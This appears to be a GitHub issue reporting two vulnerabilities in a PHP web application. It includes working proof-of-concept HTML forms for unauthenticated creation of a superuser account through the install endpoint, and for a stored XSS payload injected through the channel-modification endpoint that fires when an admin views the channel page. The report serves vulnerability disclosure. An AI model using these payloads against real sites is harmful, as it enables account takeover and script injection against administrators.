Skip to content

Some vulnerability #161

Open
Open
@ppb2018

Description

@ppb2018
  1. create user without login
    Just update the url without login, the test user will be create.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http&#58;&#47;&#47;127&#46;0&#46;0&#46;1&#47;" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2.add data without login and execute evil code.

Change the channel_id then Open html page even without login.When admin access /index.php?/manage/channel ,the evil code will execute.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel&#95;id" value="979" />
      <input type="hidden" name="channel&#95;name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions